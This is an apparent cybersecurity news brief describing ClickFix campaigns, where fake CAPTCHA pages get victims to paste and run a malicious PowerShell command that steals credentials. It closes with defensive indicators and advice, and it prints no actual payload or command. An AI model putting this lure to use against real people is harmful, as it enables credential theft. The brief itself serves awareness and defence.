The attack relies on social engineering to trick users into copying and running a malicious PowerShell payload disguised as a browser verification step.
Social Engineering with Fake Security Checks
Attackers are using deceptive CAPTCHA and ClickFix prompts to trick users into running malicious scripts that steal credentials. Victims visit seemingly legitimate sites where they encounter a fake CAPTCHA verification page. Instead of proving they are human, the page instructs them to press a key combination that copies a malicious PowerShell command to the clipboard and then opens Windows Run to execute it. This technique bypasses traditional security controls because the user voluntarily triggers the infection chain.
Impact and Indicators of Compromise
The campaign targets users across various industries, aiming to harvest login credentials for corporate networks, email accounts, and cloud services. Once credentials are stolen, attackers can move laterally, deploy ransomware, or exfiltrate sensitive data. No specific CVEs are associated with this attack vector, as it exploits human behavior rather than software vulnerabilities. However, organizations should monitor for unusual clipboard access requests and unexpected PowerShell executions. Users are advised to verify CAPTCHA pages that demand manual command execution and to report any prompts that require pressing Win+R or Ctrl+V after a verification step.
Source: Cyber Security News
